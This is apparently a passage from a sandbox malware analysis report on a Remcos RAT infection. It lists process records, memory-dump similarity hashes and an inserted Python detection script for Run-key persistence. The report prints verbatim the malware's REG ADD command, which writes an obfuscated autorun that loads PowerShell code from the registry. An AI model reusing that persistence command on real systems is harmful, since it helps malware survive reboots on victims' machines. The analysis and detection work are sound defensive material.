                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:17:21:07
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                              Imagebase:0x7ff6eef20000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:9
                                                                              Start time:17:21:12
                                                                              Start date:02/05/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1888,i,9343559299430913976,12874712062366799984,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                              Imagebase:0x7ff76e190000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:11
                                                                              Start time:17:21:13
                                                                              Start date:02/05/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
                                                                              Imagebase:0x7ff76e190000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:17:21:14
                                                                              Start date:02/05/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1968,i,3232856823138323663,3674453500036115141,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                              Imagebase:0x7ff76e190000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:17:21:40
                                                                              Start date:02/05/2024
                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                              Imagebase:0xd40000
                                                                              File size:516'608 bytes
                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:16
                                                                              Start time:17:21:50
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:17
                                                                              Start time:17:21:50
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:18
                                                                              Start time:17:21:50
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
                                                                              Imagebase:0xa90000
                                                                              File size:59'392 bytes
                                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true
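The three process records above (Targets 15, 16 and 18) show the two signals a responder would alert on: wab.exe, the Windows Mail address-book binary, launching cmd.exe, and that cmd.exe writing a REG_EXPAND_SZ autorun value whose data is not a path but a %Frihjulets% variable reference followed by PowerShell that reads its real payload back out of HKCU:\Bundfloraernes. The script below is an added example, not Joe Sandbox code and not part of the report; it re-implements those two checks as triage heuristics over process-creation events. The events are constructed by hand from the command lines listed above (Target IDs reused as PIDs); the parent/child links and the explorer.exe and "Contoso" control events are assumptions, since this section of the report lists no parent process IDs.

```python
"""Triage heuristics for the Run-key persistence and wab.exe hosting seen above.

Added example, not Joe Sandbox code. The events at the bottom are constructed
to mirror the report's process list (Target IDs reused as PIDs); the parent/child
links are an ASSUMPTION, since this section of the report lists no parent IDs.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Quote-aware tokenizer: shlex mangles Windows backslashes, so split on
# whitespace and keep "..." as one token (REG's /d data is always quoted).
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\?$", re.IGNORECASE)
ENV_REF = re.compile(r"%[A-Za-z0-9_]+%")
REG_READ = re.compile(r"Get-ItemProperty\s+-Path\s+['\"]?HK", re.IGNORECASE)
HOST_BINARIES = {"wab.exe", "wabmig.exe"}            # Sigma: unusual wab children
SUSPICIOUS_CHILDREN = {"cmd.exe", "reg.exe", "powershell.exe"}


@dataclass
class RunKeyEntry:
    key: str
    name: str
    reg_type: str
    data: str


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def tokenize(cmdline: str) -> list[str]:
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def parse_reg_add(cmdline: str) -> RunKeyEntry | None:
    """Return the key/value written by a 'REG ADD' command line, else None."""
    toks = tokenize(cmdline)
    up = [t.upper() for t in toks]
    start = next((i for i in range(len(up) - 2)
                  if (up[i] == "REG" or up[i].endswith("REG.EXE")) and up[i + 1] == "ADD"), None)
    if start is None:
        return None
    opts = {"/V": "", "/T": "REG_SZ", "/D": ""}      # REG defaults to REG_SZ
    j = start + 3
    while j < len(toks):
        if up[j] in opts and j + 1 < len(toks):
            opts[up[j]] = toks[j + 1]
            j += 2
        else:
            j += 1                                    # /f and unknown flags
    return RunKeyEntry(toks[start + 2], opts["/V"], opts["/T"], opts["/D"])


def run_key_findings(entry: RunKeyEntry | None) -> list[str]:
    """Flag autorun writes whose command is expanded and fetched only at logon."""
    findings: list[str] = []
    if entry is None or not RUN_KEY.search(entry.key):
        return findings
    findings.append(f"autorun value '{entry.name}' written to {entry.key}")
    env = sorted(set(ENV_REF.findall(entry.data)))
    if entry.reg_type.upper() == "REG_EXPAND_SZ" and env:
        findings.append("REG_EXPAND_SZ data expands %s at logon: whatever the variable "
                        "holds becomes the command, and it is not visible here" % ", ".join(env))
    if REG_READ.search(entry.data):
        findings.append("autorun data reads its payload back from the registry "
                        "(Get-ItemProperty) instead of carrying it inline")
    return findings


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Return (pid, finding) pairs for the host/child and Run-key heuristics."""
    by_pid = {e.pid: e for e in events}
    alerts: list[tuple[int, str]] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        child = _basename(e.image)
        if parent and _basename(parent.image) in HOST_BINARIES and child in SUSPICIOUS_CHILDREN:
            alerts.append((e.pid, f"{_basename(parent.image)} spawned {child}"))
        for finding in run_key_findings(parse_reg_add(e.cmdline)):
            alerts.append((e.pid, finding))
    return alerts


# Constructed events (PIDs = report Target IDs; the 15 -> 16 -> 18 chain is assumed).
REG_ADD_DATA = r"%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
REG_ADD_CMD = (r'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" '
               r'/t REG_EXPAND_SZ /d "' + REG_ADD_DATA + '"')
SAMPLE_EVENTS = [
    ProcEvent(1, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(15, 5, r"C:\Program Files (x86)\Windows Mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    ProcEvent(16, 15, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD_CMD),
    ProcEvent(17, 16, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(18, 16, r"C:\Windows\SysWOW64\reg.exe", REG_ADD_CMD),
    # Benign control (assumed): a REG_SZ write outside the autorun keys raises nothing.
    ProcEvent(20, 1, r"C:\Windows\System32\reg.exe",
              r"REG ADD HKCU\Software\Contoso\Updater /v LastRun /t REG_SZ /d 2024-05-02"),
]

if __name__ == "__main__":
    for pid, finding in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: {finding}")
```

Running it lists four findings for PID 16 (the wab.exe-to-cmd.exe spawn plus the three Run-key findings) and three for PID 18, and nothing for the conhost, explorer or control events. The value of the second and third Run-key checks is that neither the interpreter nor the payload appears in the Run value itself: to see what actually executes at logon you have to dump the user's environment variables (for %Frihjulets%) and the HKCU:\Bundfloraernes\Equalized value, so a responder should collect both before the host is rebooted.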

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2511068640.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd9ba00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c5a3bdb9e3c7469313b26575d8a23316a1faa82ef2d22583ab76ed10034f8e3d
                                                                                • Instruction ID: 0eba1d05698fd1e245aef3c7b530cd3166886e04c69593ae42f41a4cbd4d2b93
                                                                                • Opcode Fuzzy Hash: c5a3bdb9e3c7469313b26575d8a23316a1faa82ef2d22583ab76ed10034f8e3d
                                                                                • Instruction Fuzzy Hash: 36F1C431A09A4E8FEBA8DF28C8557F977D1FF55310F04426AE88EC7295CF7499418B82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2511068640.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd9ba00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e4eeb1fb3b2697172b9628631ef04354273bc02e630188306613ef20ff4cf483
                                                                                • Instruction ID: 1c2c252f80f2e66417c1177453eb2162ea22d708de79a4b36cfe63e265d30459
                                                                                • Opcode Fuzzy Hash: e4eeb1fb3b2697172b9628631ef04354273bc02e630188306613ef20ff4cf483
                                                                                • Instruction Fuzzy Hash: 9DE1E630A09A4E8FEBA8DF28C8657F977D1FF65310F14426ED88DC72A5CE7499448B81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2511859575.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd9bad0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 996706999bde4900b02c33b573026803b2f48e6a09007e53aeff16abee3d7af6
                                                                                • Instruction ID: bc464aa1087a8e13f434fd3ea7c6de94b2ff126f32e56d489be10765f00ab4ab
                                                                                • Opcode Fuzzy Hash: 996706999bde4900b02c33b573026803b2f48e6a09007e53aeff16abee3d7af6
                                                                                • Instruction Fuzzy Hash: 8FE11A32B0FB8E0FEBA5DB6988785A47BD1EF95314B0902BED45DC31E3DA58E9058341
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2511859575.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd9bad0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a748b80234e6e39c2c4a2cbe0feb861e78b1cdd9592756dca3578fb966a7de18
                                                                                • Instruction ID: d45902f7dfc9c661c01ab6684be382e9dfeb206a3cd0604fdc73e3e7c40d165d
                                                                                • Opcode Fuzzy Hash: a748b80234e6e39c2c4a2cbe0feb861e78b1cdd9592756dca3578fb966a7de18
                                                                                • Instruction Fuzzy Hash: E1D13922A0FACE0FEB669B6848655B57BA0EF96314B0902FED09DC70F3DD58AD05C351
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2511859575.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd9bad0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 47d4b2f179a6a3dc7f560ac1a275480dfbdbb695a7d7bc02d65bc527d14ae04e
                                                                                • Instruction ID: 3264593c4e4200c4a0447c895787df716f764f4ac66682582781b5e2d4b5f071
                                                                                • Opcode Fuzzy Hash: 47d4b2f179a6a3dc7f560ac1a275480dfbdbb695a7d7bc02d65bc527d14ae04e
                                                                                • Instruction Fuzzy Hash: E0512622F1FB8E0FE7A5ABA948785B466D1EFD5250B4A02BED45CC31E3DD19EC088301
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2511068640.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd9ba00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                • Instruction ID: b220a1cc0a0b9230a0975922b247239f4a2cfb504a8173b9b706129d74a91d6d
                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                • Instruction Fuzzy Hash: FD01677121CB0C4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D736E881CB45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2511859575.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd9bad0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 232cbb18474903e930f1506ea66f2b3fd89c7227566a19e7eaa3c0c4bc45957d
                                                                                • Instruction ID: f58a7357b39866c9c5a0690e339d18000ff2fe49cff9f3729498345ffd6c4578
                                                                                • Opcode Fuzzy Hash: 232cbb18474903e930f1506ea66f2b3fd89c7227566a19e7eaa3c0c4bc45957d
                                                                                • Instruction Fuzzy Hash: 1CE04F3270E6885FDB65EA5CA8124D8B7E0EF8623170501F7E199C7062D615AC558790
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$x.fk$-fk
                                                                                • API String ID: 0-198655135
                                                                                • Opcode ID: df84e4609170ccb340bd266df62fd646fa75d04188a6735836c89936aaf87fcf
                                                                                • Instruction ID: 951283956ed31ae7f26fe56e0327f4f6d5db1522eb5dd60d42b5bb5e5ba98fbf
                                                                                • Opcode Fuzzy Hash: df84e4609170ccb340bd266df62fd646fa75d04188a6735836c89936aaf87fcf
                                                                                • Instruction Fuzzy Hash: 8B6290B0A00219CFDB24CF58C950B6AFBB2AF95304F1484A9D509AF355CB32ED87DB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful
                                                                                • API String ID: 0-2454659252
                                                                                • Opcode ID: 9665595aee3c8758970d355a1959d2e940de064a65f55a4b1cfa92a730cad0bf
                                                                                • Instruction ID: c5a811efb430a823895a6b0cd7c5b96261a2c25ae88f4710209366c48693fdaf
                                                                                • Opcode Fuzzy Hash: 9665595aee3c8758970d355a1959d2e940de064a65f55a4b1cfa92a730cad0bf
                                                                                • Instruction Fuzzy Hash: 726259B4B00219CFCB54DF98CA41A5AFBB2AF94318F14C069D9099F365CB72EC46DB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$x.fk$-fk
                                                                                • API String ID: 0-3003281799
                                                                                • Opcode ID: f3f390f617263e9ca3174d306a72dd70daa2ec352cb942471c049af5818eb230
                                                                                • Instruction ID: 0264e7b4adb8fba754170c8edeab42eb92205768107ce86e653a23927d2c6cee
                                                                                • Opcode Fuzzy Hash: f3f390f617263e9ca3174d306a72dd70daa2ec352cb942471c049af5818eb230
                                                                                • Instruction Fuzzy Hash: E3D16DB0B402199FCB14DF68C551B9EBBA2EBD4308F14C469D9016F3A5CF76EC868B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$4'^q$4'^q$x.fk$x.fk$-fk
                                                                                • API String ID: 0-665962619
                                                                                • Opcode ID: 014418b2788f57de56c6aa0f87b1d032aec62312699b43e4f230d07fb4c52b35
                                                                                • Instruction ID: d4016549e516fe9099b34e511bdce8a68dd754e7ca29a87919aed7e5d56eec56
                                                                                • Opcode Fuzzy Hash: 014418b2788f57de56c6aa0f87b1d032aec62312699b43e4f230d07fb4c52b35
                                                                                • Instruction Fuzzy Hash: D9F193B0B402159FDB64DF28C950F5ABBB3AF84304F1084A9D509AF795CF72ED868B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$4'^q$x.fk$-fk
                                                                                • API String ID: 0-1095101070
                                                                                • Opcode ID: 6b7ad7afb97e801810f8729250edc758709b7e968a37854db7550a6080dcf9f6
                                                                                • Instruction ID: 4dc05f9835910fd74b5efe79f15f2ed2b1ce4d5cca9768d42c221ab99b4650f9
                                                                                • Opcode Fuzzy Hash: 6b7ad7afb97e801810f8729250edc758709b7e968a37854db7550a6080dcf9f6
                                                                                • Instruction Fuzzy Hash: E0A17BB0A002159FCB14CF68C540B9EFBB2EB98308F14C169D9016F3A5CB76EC879B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                • API String ID: 0-3272787073
                                                                                • Opcode ID: 022b5a57c71df5a020bbbd88cdfd9b0d0495193bdbd29f30c15000f88c133d14
                                                                                • Instruction ID: 0637f33ce4595b79894f6c99de320aef7f915d3b8d8f3f811793d90b20815e9a
                                                                                • Opcode Fuzzy Hash: 022b5a57c71df5a020bbbd88cdfd9b0d0495193bdbd29f30c15000f88c133d14
                                                                                • Instruction Fuzzy Hash: 8C515A707043559FCB168B28C915B6AFFB19F92314F1480ABD4449F693CB32D857E7A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$(ful
                                                                                • API String ID: 0-3290164086
                                                                                • Opcode ID: 7fdf96e0a3c46e2f97e1066feb3f4b5bc674a1ea45429631543e1c58c7d2aeb4
                                                                                • Instruction ID: 874f78efe8e1fb0070c446349ecf6211d9fb967a6d710969670b51d8bd8f1d30
                                                                                • Opcode Fuzzy Hash: 7fdf96e0a3c46e2f97e1066feb3f4b5bc674a1ea45429631543e1c58c7d2aeb4
                                                                                • Instruction Fuzzy Hash: 3D3247B4A002159FCB64CF98C941E99FBB2BF94328F14C099DA099F365CB72EC46DB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$(ful
                                                                                • API String ID: 0-3290164086
                                                                                • Opcode ID: aff3d542418ef2fdc031de328dd2a626746fb3016dd38a82bb17d5d53a3c7c32
                                                                                • Instruction ID: 88781f58c08bb6e80471a314359445be1b6c9ffb9533583734ee86371aa2048b
                                                                                • Opcode Fuzzy Hash: aff3d542418ef2fdc031de328dd2a626746fb3016dd38a82bb17d5d53a3c7c32
                                                                                • Instruction Fuzzy Hash: 3C1236B4A00215DFCB64CF98C941AA9FBB2BF94318F14C099DA059F365CB72EC46EB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$$^q
                                                                                • API String ID: 0-953868773
                                                                                • Opcode ID: 4673f7f6762b4c154e441ddaeeba03c6412ffbad2655f3f6c5deebcc0563412a
                                                                                • Instruction ID: c6f16bf820f8b0e61072a0a2946717a9dc78b2fa772b89118ce0277aa088dd10
                                                                                • Opcode Fuzzy Hash: 4673f7f6762b4c154e441ddaeeba03c6412ffbad2655f3f6c5deebcc0563412a
                                                                                • Instruction Fuzzy Hash: 468139B2B0022A8FDB145B68990067BFBA6AFA5218F18847AD445CB251DE31C953D7A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$x.fk
                                                                                • API String ID: 0-2383735965
                                                                                • Opcode ID: 9bda31955e3d07b9579768d4de49ce5bf0f2182a4341627c61c9648eb750c80b
                                                                                • Instruction ID: 4fe3740242a8dcc8b090f9c98f084a5da238c688a8408d10ac9eb5f5c6cbad7c
                                                                                • Opcode Fuzzy Hash: 9bda31955e3d07b9579768d4de49ce5bf0f2182a4341627c61c9648eb750c80b
                                                                                • Instruction Fuzzy Hash: 4891B0F4B002149FD744DB68C945FAEBBE3AB98308F508068D505AF795CB72EC529B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $^q$$^q$$^q
                                                                                • API String ID: 0-831282457
                                                                                • Opcode ID: a3ca15334894d340de96ad39420bfc75e8b5088672a5af11fb6b232fe85be357
                                                                                • Instruction ID: 703740f74b201a95f10aca406512b2f0c5bac21306b6d059e839994e9086e3fb
                                                                                • Opcode Fuzzy Hash: a3ca15334894d340de96ad39420bfc75e8b5088672a5af11fb6b232fe85be357
                                                                                • Instruction Fuzzy Hash: F43149B1704226CFD7189B59D844A76F7A2EFE121DB28C02ED5458F251DE33C807D754
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$x.fk
                                                                                • API String ID: 0-1226617640
                                                                                • Opcode ID: b4e9287ef44d4ce27bf2d3725aa33d85858160716b5a1e3da0e0b7f35e6ba9f9
                                                                                • Instruction ID: 72ea77a0e57d2d9ec000f957cd68650eadfee13b12de65c4c0c1152e1cbd184b
                                                                                • Opcode Fuzzy Hash: b4e9287ef44d4ce27bf2d3725aa33d85858160716b5a1e3da0e0b7f35e6ba9f9
